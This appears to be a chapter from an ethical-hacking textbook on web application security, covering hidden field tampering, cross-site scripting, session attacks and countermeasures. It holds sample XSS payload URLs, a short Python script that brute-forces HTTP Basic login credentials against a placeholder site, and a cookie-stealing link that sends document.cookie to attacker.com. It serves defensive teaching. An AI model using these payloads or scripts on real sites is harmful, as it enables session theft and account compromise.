Module Objectives


This module examines some of the vulnerabilities that have security implications within web applications. The objective is to emphasize the need to secure these applications, as they can allow an attacker to compromise a web server or network over the legitimate port of entry. As more businesses host web based applications as a natural extension of themselves, the damage that can result from a compromise assumes significant proportions. After completing this module you will be familiar with the following aspects:

  • Understanding Web Application Security

  • Common Web Application Security Vulnerabilities

  • Web Application Penetration Methodologies

  • Input Manipulation

  • Authentication And Session Management

  • Tools: Lynx, Teleport Pro, Black Widow, Web Sleuth

  • Countermeasures

start sidebar
Understanding Web Application Security
end sidebar
 
Note  

Web application security differs from the general discussion of security. In the general context, an IDS and/or firewall lends some degree of security. In the case of web applications, however, the session takes place through an allowed port - typically the default web server port 80. This is equivalent to establishing a connection without a firewall. Even if encryption is implemented, it only encrypts the transport: in the event of an attack, the attacker's session will simply be encrypted as well. Encryption does not thwart the attack.

Attacking web applications is one of the most common ways attackers compromise hosts, networks and users. Defending against these attacks is challenging because the actions performed often leave little scope for meaningful logging. This is particularly true for today's business applications, where a significant percentage of applications are custom made or sourced from third party software components.

Apart from user awareness in the adoption of these software components, improper integration of the components can lead to security concerns. While the trend is to separate the business logic into its own layer, improper integration with existing software can interrupt the flow of business logic. Such a mismatch may be patched up just to complete the functionality of the application. In the process, however, it may give rise to a vulnerability that can be exploited to gain access to the data or to manipulate the business logic that handles the data.

The alarming fact is that generally nobody notices this until serious damage has been done. To the end user, the application may appear to function as desired. At the organization level, complacency settles in as the organization considers itself secure on the strength of its network security. The fact that application level attacks take place over a single port of entry, legitimately open for business needs, is often forgotten.

start sidebar
Common Web Application Vulnerabilities
  • Reliability of Client-Side Data

  • Special Characters that have not been escaped

  • HTML Output Character Filtering

  • Root accessibility of web applications

  • ActiveX/JavaScript Authentication

  • Lack of User Authentication before performing critical tasks.

end sidebar
 

It has been noted that most web application vulnerabilities can be eliminated to a great extent at the design stage. Apart from this, common security procedures are often overlooked in the functioning of the application.

Threat  

Reliability of Client-Side Data: It is recommended that the web application rely on server side data for critical operations rather than on client side data, especially for input purposes, since anything stored or computed on the client side can be modified by the user before it is sent back.

Threat  

Special Characters that have not been escaped: Often this aspect is overlooked, and special characters that attackers can use to modify instructions are left unescaped in web application code. For example, UTF-7 provides alternative encodings for "<" and ">", and several popular browsers recognize these as the start and end of a tag.
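
To illustrate, the following Python sketch (illustrative, not from the original text) prints the UTF-7 byte sequence that a browser auto-detecting UTF-7 would interpret as a script tag:

 import codecs

 # UTF-7 re-encodes "<" and ">" with a modified base64 escape, so a filter
 # that only looks for the literal characters will miss these sequences.
 payload = "<script>"
 print(codecs.encode(payload, "utf-7"))   # b'+ADw-script+AD4-'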

Threat  

HTML Output Character Filtering: Output filtering helps a developer build an application that is not susceptible to cross-site scripting attacks. When user-supplied information is displayed back to users, it should be escaped so that any embedded HTML is rendered inactive.
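
As a minimal sketch of such output escaping (Python; the function name render_comment is illustrative):

 import html

 def render_comment(user_text):
     # Escape <, >, & and quotes so any markup in the input is displayed
     # as text instead of being interpreted by the browser.
     return "<p>" + html.escape(user_text, quote=True) + "</p>"

 print(render_comment("<script>alert(1)</script>"))
 # <p>&lt;script&gt;alert(1)&lt;/script&gt;</p>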

Threat  

Root accessibility of web applications: Ideally, a web application should not expose the root directory of the web server. Sometimes it is possible for a user to reach files outside the intended directory by manipulating the input or the URL.
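
A hedged sketch of guarding against such manipulation, assuming files are served from a fixed document root (the path and function name are illustrative):

 import os

 WEB_ROOT = "/var/www/html"   # assumed document root

 def safe_path(requested):
     # Resolve the requested path and refuse anything that escapes
     # WEB_ROOT, e.g. inputs such as "../../etc/passwd".
     full = os.path.realpath(os.path.join(WEB_ROOT, requested))
     if not full.startswith(WEB_ROOT + os.sep):
         raise ValueError("path traversal attempt: " + requested)
     return full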

Threat  

ActiveX/JavaScript Authentication: Authentication implemented in client side scripting languages is easily bypassed and is vulnerable to attacks such as cross-site scripting.

Threat  

Lack of User Authentication before performing critical tasks: An obvious security lapse, where access to a restricted area is granted without proper authentication, where an authentication cache is reused, or where logout procedures are poor. Such applications can also be vulnerable to cookie based attacks.

start sidebar
Web Application Penetration Methodologies
  • Information Gathering and Discovery

    • Documenting Application / Site Map

    • Identifiable Characteristics / Fingerprinting

    • Signature Error and Response Codes

    • File / Application Enumeration

      • Forced Browsing

      • Hidden Files

      • Vulnerable CGIs

      • Sample Files

  • Input/Output Client-Side Data Manipulation

end sidebar
 
Attack Methods  

Penetrating web servers is no different from attacking other systems when it comes to the basic methodology. Here also, we begin with information gathering and discovery. This can be anything from searching for particular file types or banners on search engines such as Google. For example, searching for "index of /" may bring up unsuspecting directories on interesting sites, where one may find information that can be used for penetrating the web server.

Another area of interest is identifying the nature of the web application and going over the site map to detect weak areas. These may be links to another site or to the intranet itself. The attacker can go over the source code and find links to other pages and form fields that may be vulnerable. Apart from this, forcing the application to return errors can help in fingerprinting and identifying the host. This exercise can also reveal vulnerabilities that can be exploited.

File and application enumeration can be done through forced browsing, and by discovering hidden files, vulnerable CGIs and sample files.

Finally, the real penetration can be carried out through input or output manipulation on the client side. These techniques are detailed in the following pages.

start sidebar
Hacking Tool: Instant Source

http://www.blazingtool.com

  • Instant Source lets you take a look at a web page's source code, to see how things are done. Also, you can edit HTML directly inside Internet Explorer!

  • The program integrates into Internet Explorer and opens a new toolbar window which instantly displays the source code for whatever part of the page you select in the browser window.

end sidebar
 
Tools  

Instant Source is an application that lets the user view the underlying source code as he browses a web page. The traditional way of doing this has been the View Source command in the browser. However, that process is tedious, as the viewer has to parse the entire text file when searching for a particular block of code. Instant Source allows the user to view the code for the selected elements instantly, without having to open the entire source.

The program integrates into Internet Explorer and opens a new toolbar window, instantly displaying the source code of the page or selection in the browser window. Instant Source can show all Flash movies, script files (*.JS, *.VBS), style sheets (*.CSS) and images on a page. All external files can be demarcated and stored separately in a folder. The tool also includes HTML, JavaScript and VBScript syntax highlighting and support for viewing external CSS and script files directly in the browser - functionality that is not available from the View Source command.

With dynamic HTML, the source code changes after the basic HTML page - the HTML originally loaded from the server, before any further processing - has loaded. Instant Source integrates into Internet Explorer and shows these changes, eliminating the need for an external viewer.

While this is a handy tool for developers, consider its possible misuse. A user with malicious intent can scrutinize the source code of a target web application's interactive components and can even map the structure of the application if the code reveals it. He can also get a rough assessment of the authentication mechanism and session management implemented by the application.

start sidebar
Hacking Tool: Lynx

http://lynx.browser.org

  • Lynx is a text-based browser used for downloading source files and directory links.

end sidebar
 
Tools  

Lynx is a text browser client for users running cursor-addressable, character-cell display devices. It can display HTML documents containing links to files on the local system, as well as files on remote systems running http, gopher, ftp, wais, nntp, finger, or cso/ph/qi servers, and services accessible via logins to telnet, tn3270 or rlogin accounts. Current versions of Lynx run on UNIX, VMS, Windows 3.x/9x/NT, 386DOS and OS/2 EMX.

Lynx can be used to access information on the Internet, or to build information systems intended primarily for local access. The current developmental Lynx has two PC ports, for Win32 (95 and NT) and DOS 386+. There is an SSL enabled version of Lynx for Win32 by the name of lynxw32.lzh.

The default Download option is Save to disk. It is disabled if Lynx is running in anonymous mode. Any number of download methods, such as kermit and zmodem, may be defined in addition to this default in the lynx.cfg file.

start sidebar
Hacking Tool: Wget

www.gnu.org/software/wget/wget.html

  • Wget is a command line tool for Windows and Unix that will download the contents of a web site.

  • It works non-interactively, so it can keep working in the background after the user has logged off.

  • Wget works particularly well with slow or unstable connections by continuing to retrieve a document until the document is fully downloaded.

  • Both http and ftp retrievals can be time stamped, so Wget can see if the remote file has changed since the last retrieval and automatically retrieve the new version if it has.

end sidebar
 
Tools  

GNU Wget is a freely available network utility to retrieve files from the Internet using HTTP and FTP. It works non-interactively, allowing it to run in the background after the user has logged off. Recursive retrieval of HTML pages, as well as of FTP sites, is supported. Wget can be used to make mirrors of archives and home pages, or to traverse the web like a WWW robot.

Wget works well on slow or unstable connections, retrying the document until it is fully retrieved; re-getting files from where a transfer left off works on servers (both HTTP and FTP) that support it. Matching of wildcards and recursive mirroring of directories are available when retrieving via FTP. Both HTTP and FTP retrievals can be time-stamped, so Wget can see whether the remote file has changed since the last retrieval and automatically retrieve the new version if it has.

By default, Wget supports proxy servers, which can lighten the network load, speed up retrieval and provide access behind firewalls. However, if the user is behind a firewall that requires a SOCKS style gateway, he can get the SOCKS library and compile Wget with SOCKS support.

Wget allows installation of a global startup file (/etc/wgetrc on RedHat) for site settings. Wget has many features to make retrieving large files or mirroring entire web or FTP sites easy, including:

  • resuming aborted downloads using REST and RANGE

  • filename wildcards and recursive mirroring of directories

  • NLS-based message files for many different languages

  • optional conversion of absolute links in downloaded documents to relative links, so that downloaded documents may link to each other locally

  • support for most UNIX-like operating systems as well as Microsoft Windows

  • support for HTTP and SOCKS proxies, persistent HTTP connections and HTTP cookies
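
As a usage illustration (the target URL is hypothetical), a typical mirroring invocation combining several of these features might be:

 wget --mirror --convert-links --no-parent -c http://www.example.com/app/

Here --mirror turns on recursion and time-stamping, --convert-links rewrites absolute links for local browsing, --no-parent keeps the crawl inside the starting directory, and -c resumes a partially retrieved file.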

start sidebar
Hacking Tool: Black Widow

http://softbytelabs.com

  • Black Widow is a website scanner, a site mapping tool, a site ripper, a site mirroring tool, and an offline browser program.

  • Use it to scan a site and create a complete profile of the site's structure, files, E-mail addresses, external links and even link errors.

end sidebar
 
Tools  

Another tool that can be found in an attacker's arsenal is Black Widow. This tool can be used for various purposes because it functions as a web site scanner, a site mapping tool, a site ripper, a site mirroring tool, and an offline browser program. Note its use as a site mirroring tool. An attacker can use it to mirror the target site on his hard drive and parse it for security flaws in the offline mode.

The attacker can also use this for the information gathering and discovery phase by scanning the site and creating a complete profile of the site's structure, files, e-mail addresses, external links and even error messages. This will help him launch a targeted attack that has a better chance of succeeding while leaving a smaller footprint.

The attacker can also look for specific file types and download any selection of files, from 'JPG' to 'CGI' to 'HTML' to MIME types. There is no file size restriction, and the user can download small to large files that are part of a site or from a group of sites.

The tool has pre-scan filtering options that can assist the user in configuring his scan operations. Black Widow will scan HTTP sites, SSL sites (HTTPS) and FTP sites. This can aid in gathering information regarding authentication mechanisms and session management techniques.

Another possible use is following external links and detecting weakly secured links that can be exploited to gain access to the web application.

start sidebar
Hacking Tool: WebSleuth

http://sandsprite.com/sleuth/

  • WebSleuth is an excellent tool that combines spidering with the capability of a personal proxy such as Achilles.

end sidebar
 
Tools  

WebSleuth is a tool that combines web crawling with the capability of a personal proxy. The current version supports functionality to convert hidden and select form elements to textboxes, parse and analyze forms efficiently, edit the rendered source of web pages, and edit cookies in their raw state.

It can also make raw HTTP requests to servers, impersonating the referrer, cookie, etc.; block JavaScript popups automatically; highlight and parse the full HTML source code; and analyze CGI links, apart from logging all surfing activity and the HTTP headers of requests and responses.

WebSleuth can generate reports on the elements of a web page and facilitates enhanced proxy management as well as security settings management. It can monitor cookies in real time, and its JavaScript console aids in interacting directly with a page's scripts and in removing all scripts from a web page.

start sidebar
Hidden Field Manipulation
  • Hidden fields are embedded within HTML forms to maintain values that will be sent back to the server.

  • Hidden fields serve as a means for the web application to pass information between different pages or components.

  • Using this method, an application may pass the data without saving it to a common backend system (typically a database).

  • A major assumption about hidden fields is that, since they are not visible (i.e. hidden), they will not be viewed or changed by the client.

  • Web attacks challenge this assumption by examining the HTML code of the page and changing the request (usually a POST request) going to the server.

  • By changing the value, the logic tying the different parts of the application together is subverted, and the application is manipulated into accepting the new value.

end sidebar
 
Attack Methods  

Hidden field tampering:

Most of us who have dabbled with some HTML coding have come across the hidden field. For example, consider the code below:

 <input type="hidden" name="ref" size="20" value="http://www.website.com">
 <input type="hidden" name="forref" size="20" value="">
 <input type="text" name="username" size="20" value="">

Most web applications rely on HTML forms to receive input from the user. However, users can choose to save the form to a file, edit it, and then use the edited form to submit data back to the server. Herein lies the vulnerability: this is a "stateless" interaction with the web application, since HTTP transactions are connectionless, one-time transmissions.

The conventional way of checking the continuity of a connection is to check the state of the user from information stored at the user's end (another pointer to the fallacy of trusting client side data). This state can be stored in a browser in three ways: cookies, encoded URLs and HTML form "hidden" fields.

We will discuss cookies and encoded URLs elsewhere in this module. "Hidden" fields are preferred by developers because they have less overhead and can hold a lot of information. However, they can be easily tampered with. For instance, if an attacker saves a critical form, such as an authentication form, onto his system, he can view the contents of the file, including the values in the "hidden" fields. Using a text editor, he can change any of the hidden fields, as the web application may implicitly trust the input taken from them.

One way of hedging this risk is to use the HTTP_REFERER header to check which page the user last visited. However, anybody with a little programming knowledge can write a script to render this check useless: checking HTTP_REFERER will catch trivial attempts to tamper with forms, but it cannot be relied on for serious web applications. The bottom line is that anything sent back by a web browser - form fields, HTTP headers, even cookies - can be tampered with and must be considered untrustworthy information.
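
A hedged sketch of such a referer check (Python; the headers dictionary and expected prefix are illustrative):

 def referer_looks_valid(headers):
     # Catches only trivial tampering: the Referer header is supplied by
     # the client and can be forged, so never rely on this check alone.
     referer = headers.get("Referer", "")
     return referer.startswith("http://www.website.com/")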

Detecting "hidden" field tampering adds security to web applications, but for critical applications such as e-commerce, hidden fields should be avoided at the design level. For instance, consider someone placing an order at amazon.com and briefly leaving their desk halfway through. Anyone with access to the computer can use "view source" to see the credit card information and other data stored in "hidden" fields (if they are being used). A best practice in developing web applications is to avoid storing vital information in "hidden" fields.


Consider an online shopping cart that uses a hidden field to pass pricing information between the order processing system and the order fulfillment system. If the application does not use a backend mechanism to verify the flow of pricing information, altering the price leads to the ability to buy the product for a smaller amount, and potentially even for a negative sum.
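
A minimal sketch of the backend verification called for above, assuming the server keeps an authoritative price catalog (all names and values are illustrative):

 PRICE_CATALOG = {"sku-1001": 49.99, "sku-1002": 120.00}   # server-side prices

 def checkout(form):
     # Ignore any client-supplied "price" hidden field entirely and
     # look the price up server-side instead.
     sku = form["sku"]
     if sku not in PRICE_CATALOG:
         raise ValueError("unknown item: " + sku)
     quantity = int(form["quantity"])
     if quantity < 1:
         raise ValueError("invalid quantity")
     return PRICE_CATALOG[sku] * quantity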

Countermeasure  

The first rule of web application development, from a security standpoint, is not to rely on client side data for critical processes. Using encrypted sessions such as SSL, or "secure" cookies, is advocated instead of using hidden fields. The values of critical parameters may also be hashed with a keyed digest or digital signature so that the authenticity of the data can be ascertained. The safest bet is to rely on server side authentication mechanisms for high security applications.
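
One way to realize the hashing idea is a keyed hash (HMAC) over the critical parameter, sketched below under the assumption of a server-side secret that is never sent to the client:

 import hmac, hashlib

 SECRET_KEY = b"server-side-secret"   # assumed; kept on the server only

 def sign(value):
     # The value and its MAC are both placed in the form or URL.
     return hmac.new(SECRET_KEY, value.encode(), hashlib.sha256).hexdigest()

 def verify(value, mac):
     # Recompute the MAC server-side; a tampered value will not match.
     return hmac.compare_digest(sign(value), mac)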

start sidebar
Input Manipulation
  • URL Manipulation / CGI Parameter Tampering

  • HTTP Client-Header Injection

  • Filter/Intrusion Detection Evasion

  • Protocol/Method Manipulation

  • Overflows

end sidebar
 
Attack Methods  

In the context of a web based attack (or web server attack), the attacker will first try to probe and manipulate the input fields to gain access to the web server. These techniques can be broadly categorized as given below.

URL Manipulation / CGI Parameter Tampering: This is perhaps the easiest of the lot. By inserting unacceptable or unexpected input into the URL through the browser, the attacker tries to gauge whether the server is protected against common vulnerabilities.

HTTP Client-Header Injection: The next accessible point is the HTTP header. Using HTTP headers such as Referer, the attacker can manipulate the client side to suit his needs.

Filter/Intrusion Detection Evasion: From the attacker's point of view, the best part of attacking a web server is that he can use the default port of entry - port 80 - to gain access to the network. As this is a standard port open for business needs, it is easier to evade intrusion detection systems and firewalls.

Protocol/Method Manipulation: By manipulating the protocol or the HTTP method used in a request, the attacker can hack into a web server.

Overflows: Some web server vulnerabilities are buffer overflows. The advantage to the attacker is that buffer overflow techniques can make the server execute code of his choice, making it easier to exploit the server further.

start sidebar
What is Cross-Site Scripting (XSS)?
  • A web application vulnerable to XSS allows a user to inadvertently send malicious data to themselves through that application.

  • Attackers often perform XSS exploitation by crafting malicious URLs and tricking users into clicking on them.

  • These links cause client side scripting languages (VBScript, JavaScript, etc.) of the attacker's choice to execute on the victim's browser.

  • XSS vulnerabilities are caused by a failure in the web application to properly validate user input.

end sidebar
 
Attack Methods  

The simplest description of cross-site scripting is an attack that occurs when a user enters malicious data into a web site. It can be as simple as posting a message that contains malicious code to a newsgroup. When another person views this message, the browser will interpret the code and execute it, often giving the attacker control of the system. Malicious scripts can also be executed automatically based on certain events, such as when a picture loads. Unlike most security vulnerabilities, XSS doesn't apply to any single vendor's products - it can affect any software that runs on a web server.

XSS takes place as a result of the failure of the web application to validate user supplied input before returning it to the client system. "Cross-site" refers to the security restrictions that the client browser usually places on data (i.e. cookies, dynamic content attributes, etc.) associated with a web site. By causing the victim's browser to execute malicious code with the same permissions as the domain of the web application, an attacker can bypass the traditional document object model (DOM) security restrictions. The document object model is an application interface that allows client-side languages to dynamically access and modify the content, structure and style of a web page.

Cross-site scripting attacks require the execution of client-side languages (JavaScript, Java, VBScript, ActiveX, Flash, etc.) within a user's web environment. XSS can result in an attacker stealing cookies, hijacking sessions, changing web application account settings, and so on. The most common web components vulnerable to XSS attacks include CGI scripts, search engines, interactive bulletin boards, and custom error pages with poorly written input validation routines. Moreover, a victim does not necessarily have to click on a link for the attack to be possible.

Brief Example Attack:

Example 1: The IMG tag

http://host/search">
http://host/search/search.cgi?query=<img%20src=http://host2/bait-article.jpg>

Depending on the web site's setup, this generates HTML with the image from host2 and feeds it to the user when he clicks on the link. Depending on the original web page layout, it may be possible to entice a user into thinking this is a valid part of the article.

Example 2:

http://host/something">
http://host/something.php?q=<img%20src=JavaScript:wolf-in-lamb-clothing>

If a user clicks on this link, a JavaScript popup box displaying the site's domain name will appear. While this example isn't harmful, an attacker could create a falsified form or perhaps create something that grabs information from the user. The request above would be easily questioned by an alert user, but with hex, Unicode, or %u Windows encoding, a user could be fooled into thinking it is a valid site link.

Example 3:

http">
http://host/<script>Insert whatever here</script>

This particular request is a very common example.

start sidebar
XSS Countermeasures
  • As a web application user, there are a few ways to protect yourself from XSS attacks.

  • The first and most effective solution is to disable all scripting language support in your browser and email reader.

  • If this is not feasible for business reasons, another recommendation is to use reasonable caution when clicking links in anonymous e-mails and on dubious web pages.

  • Proxy servers can help filter out malicious scripting in HTML.

end sidebar
 
Countermeasure  

Preventing cross-site scripting is a challenging task, especially for large distributed web applications. If the application accepts only expected input, exposure to XSS can be significantly reduced.

Web servers should set the character set, and then make sure that the data they insert is free from byte sequences that are special in the specified encoding. This can typically be done through settings in the application server or web server. The server should define the character set in each HTML page as below.

 <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" /> 

Web pages with an unspecified character encoding work mostly because most character sets assign the same characters to byte values below 128. Some 16-bit character-encoding schemes have additional multi-byte representations for special characters such as "<". These should be checked.

The above tells the browser what character set should be used to properly display the page. In addition, most servers must also be configured to tell the browser what character set to use when submitting form data back to the server, and what character set the server application should use internally. The configuration of each server for character set control is different, but it is very important in understanding the canonicalization of input data. Filtering special meta-characters is also important: HTML defines certain characters as "special" if they have an effect on page formatting.

In an HTML body:

"<" introduces a tag.

"&" introduces a character entity.

Note  

Some browsers try to correct poorly formatted HTML and treat ">" as if it were "<".

In attributes:

  • double quotes mark the end of the attribute value.

  • single quotes mark the end of the attribute value.

  • "&" introduces a character entity.

In URLs:

  • Space, tab, and new line denote the end of the URL.

  • "&" denotes a character entity or separates query string parameters.

  • Non-ASCII characters (that is, everything above 128 in the ISO-8859-1 encoding) are not allowed in URLs.

  • The "%" must be filtered from input anywhere parameters encoded with HTTP escape sequences are decoded by server-side code.

Ensuring correct encoding of dynamic output can prevent malicious scripts from being passed to the user. While this is no guarantee of prevention, it can help contain the problem in certain circumstances. The application can make an explicit decision to encode untrusted data and leave trusted data untouched, thus preserving markup content.
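
Tying the character lists above together, a hedged Python sketch of per-context output encoding (function names are illustrative):

 import html
 import urllib.parse

 def encode_for_html_body(s):
     # Neutralize "<", ">" and "&" in HTML body text.
     return html.escape(s, quote=False)

 def encode_for_attribute(s):
     # Additionally neutralize single and double quotes inside attributes.
     return html.escape(s, quote=True)

 def encode_for_url_param(s):
     # Percent-encode everything unsafe in a query string parameter,
     # including "&", spaces and non-ASCII characters.
     return urllib.parse.quote(s, safe="")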

start sidebar
Authentication And Session Management
  • Brute/Reverse Force

  • Session Hijacking

  • Session Replay

  • Session Forging

  • Page Sequencing

end sidebar
 
Attack Methods  

Brute Force

Brute Forcing involves performing an exhaustive key search of a web application authentication token's key space in order to find a legitimate token that can be used to gain access.

According to RFC 2617, the Basic Access Authentication scheme of HTTP is not considered a secure method of user authentication (unless used in conjunction with some external secure system such as SSL), as the user name and password are passed over the network as cleartext. To receive authorization, the client sends the userid and password, separated by a single colon (":") character, within a base64 encoded string in the credentials:

 user-pass = userid ":" password
 userid    = *<TEXT excluding ":">
 password  = *TEXT

For instance, if the user agent wishes to send the userid "Winnie" and password "the pooh", it would use the following header field:

 Authorization: Basic V2lubmllOnRoZSBwb29o 

Therefore, it is relatively easy to brute force a protected page if an attacker uses decent dictionary lists. For the page http://www.victim.com/private/index.html, an attacker can generate base64 encoded strings from commonly used usernames and passwords, generate HTTP requests, and look for a response other than "401 Unauthorized".
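
A minimal sketch of that loop (Python; the URL is from the text, and the word lists are abridged and illustrative):

 import base64
 import urllib.request
 import urllib.error

 URL = "http://www.victim.com/private/index.html"
 USERS = ["admin", "test", "guest"]           # dictionary list (abridged)
 PASSWORDS = ["password", "123456", "admin"]

 for user in USERS:
     for pw in PASSWORDS:
         token = base64.b64encode(f"{user}:{pw}".encode()).decode()
         req = urllib.request.Request(URL)
         req.add_header("Authorization", "Basic " + token)
         try:
             urllib.request.urlopen(req)
             print("valid credentials:", user, pw)   # e.g. 200 OK
         except urllib.error.HTTPError:
             pass                                    # 401 etc.: keep trying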

Attack Methods  

Session Replay

If a user's authentication tokens are captured or intercepted by an attacker, the session can be replayed by the attacker, making the web application vulnerable to a replay attack. In a replay attack, the attacker openly uses the captured or intercepted authentication tokens, such as a cookie, to create or obtain service from the victim's account, thereby bypassing normal user authentication methods.

A simple example is sniffing a URL with a session ID string and pasting it back into the attacker's web browser. The legitimate user need not even be logged into the application at the time of the replay attack. While it is generally understood that username/password pairs are indeed authentication data and therefore sensitive, it is not as widely understood that these generated authentication tokens are just as sensitive. Many users who have extremely hard-to-guess passwords are careless with the protection of cookies and session information that can just as easily be used to access their accounts in a replay attack. This is often considered forging "entity authentication", since most applications check the tokens stored in the browser or HTTP stream and do not require user authentication after each web request.

By simply sniffing the HTTP request of an active session or capturing a desktop user's cookie files, a replay attack can be very easily performed. Exploitation can take the following general forms:

  1. Visiting a pre-existing, dynamically created URL that is assigned to a specific user's account and has been sniffed or captured from a proxy server log

  2. Visiting a specific URL with a preloaded authentication token (cookie, HTTP header value, etc.) captured from a legitimate user

  3. A combination of 1 and 2.

Session tokens that do not expire on the HTTP server allow an attacker unlimited time to guess or brute force a valid authenticated session token. An example is the "Remember Me" option on many retail websites. If a user's cookie file is captured or brute-forced, an attacker can use these static session tokens to gain access to that user's web accounts. Additionally, session tokens can be logged and cached in proxy servers; if an attacker breaks into such a proxy, the logs may contain tokens for sessions that have not yet expired on the HTTP server. To prevent session hijacking and brute force attacks against an active session, the HTTP server can seamlessly expire and regenerate tokens, giving an attacker a smaller window of time for replay exploitation of each legitimate token. Token expiration can be based on the number of requests or on time.
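
A hedged sketch of time- and request-based token expiry, using an in-memory store (all names and limits are illustrative):

 import os, time

 SESSIONS = {}           # token -> (created_at, request_count)
 MAX_AGE = 15 * 60       # seconds before a token is rotated
 MAX_REQUESTS = 100      # requests before a token is rotated

 def new_token():
     token = os.urandom(16).hex()
     SESSIONS[token] = (time.time(), 0)
     return token

 def touch(token):
     # Validate a presented token; rotate it when either limit is hit.
     created, count = SESSIONS.pop(token)        # KeyError -> invalid token
     if time.time() - created > MAX_AGE or count + 1 >= MAX_REQUESTS:
         return new_token()                      # expire and regenerate
     SESSIONS[token] = (created, count + 1)
     return token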

Attack Methods  

Session Forging/Brute-Forcing Detection and/or Lockout

Many websites have prohibitions against unrestrained password guessing (e.g., temporarily locking the account or blocking the IP address). With regard to session token brute-force attacks, however, an attacker can often try hundreds or thousands of session tokens embedded in a legitimate URL or cookie without a single complaint from the HTTP server. Many intrusion-detection systems do not look for this type of attack, and penetration tests often overlook this weakness in web e-commerce systems. Designers can use "booby trapped" session tokens that never actually get assigned but will detect an attacker trying to brute force a range of tokens. Anomaly/misuse detection hooks can also be built in to detect whether an authenticated user tries to manipulate his token to gain elevated privileges.

Attack Methods  

Session Re-Authentication

Critical user actions, such as money transfers or significant purchase decisions, should require the user to re-authenticate or be reissued another session token immediately prior to the action. Developers can also segment data and user actions so that re-authentication is required upon crossing certain "boundaries", preventing some types of cross-site scripting attacks that exploit user accounts.

Attack Methods  

Session Token Transmission

If a session token is captured in transit through network interception, the web application account is prone to a replay or hijacking attack. To safeguard the state mechanism token, typical web encryption technologies include, but are not limited to, the Secure Sockets Layer (SSLv2/v3) and Transport Layer Security (TLS v1) protocols.

Attack Methods  

Session Tokens on Logout

With the popularity of Internet kiosks and shared computing environments on the rise, session tokens take on a new risk. A browser only destroys session cookies when the browser process is torn down, and most Internet kiosks maintain the same browser process between users. It is therefore recommended to overwrite session cookies when the user logs out of the application.
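
A hedged illustration: on logout, the server can respond with an emptied, already-expired cookie so the browser discards the session token (the cookie name is illustrative):

 Set-Cookie: sessionid=deleted; Expires=Thu, 01 Jan 1970 00:00:00 GMT; Path=/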

Attack Methods  

Page Sequencing

Page sequencing is the term given to the vulnerability that arises from poor session management, allowing a user to take an out-of-turn action and bypass the defined sequence of web pages - for example, jumping ahead to a later stage of a financial transaction. This arises from faulty session/application state management.

start sidebar
Traditional XSS Web Application Hijack Scenario - Cookie stealing
  • The user is logged on to a web application and the session is currently active. An attacker knows of an XSS hole that affects that application.

  • The user receives a malicious XSS link via e-mail or comes across it on a web page. In some cases, an attacker can even insert it into web content (e.g. a guest book, a banner, etc.) and make it load automatically without requiring user intervention.

     <html>
     <head><title>Look at this!</title></head>
     <body>
     <a href="http://hotwired.lycos.com/webmonkey/00/18/index3a_page2.html?tw=<script>document.location.replace('http://attacker.com/steal.cgi?'+document.cookie);</script>">
     Check this CNN story out!</a>
     </body>
     </html>
end sidebar
 
Attack Methods  

It is a fact that most web sites address security by using SSL to authenticate their login sessions. Let us see how this process takes place. When the client connects to a web site, two events take place to ensure security.

  1. The web site must prove that it is the web site it claims to be.

The web site authenticates itself with the SSL certificate issued for the domain in question by a trusted third party. Depending on the extent to which the user trusts the certificate issuer, s/he can be assured that the web site is what it claims to be.

Once the web site is authenticated by the user, he can choose to establish a secure data connection via the public key mechanism of SSL, so that all the data transmitted between them is encrypted.

  2. The user must authenticate himself to the web site

The user provides his username/password in a form, and this data is transmitted in encrypted form to the web site for authentication. If the client is authenticated, a session cookie is generated with appropriate timeout and validation information. This is sent back to the user as a "secure cookie" - i.e. one that is only passed back and forth over SSL.

This can be thought of as passing a shared secret back and forth: it is encrypted, it is not the actual password, and it does time out. If the web site does not use cookies, it can opt for session codes embedded in the site URLs, so that they are never stored on the hard disk of the client computer. Some web sites require their users to obtain client SSL certificates, so that the web site can authenticate clients via these certificates and dispense with the whole username/password scheme.

Cookies were originally introduced by Netscape and are now specified in RFC 2965 (which supersedes RFC 2109), with RFC 2964 and BCP44 offering guidance on best practice. Cookies were never designed to store usernames and passwords or any sensitive information. There are two categories of cookies, secure or non-secure and persistent or non-persistent, giving four individual cookies types.

  • Persistent and Secure

  • Persistent and Non-Secure

  • Non-Persistent and Secure

  • Non-Persistent and Non-Secure
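
For illustration, the four types differ only in the attributes of the Set-Cookie header. A persistent and secure cookie might look like the line below (the name and date are illustrative); omitting Expires makes it non-persistent, and omitting Secure makes it non-secure:

 Set-Cookie: sessionid=ab12cd34; Expires=Mon, 01 Dec 2003 12:00:00 GMT; Secure; Path=/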



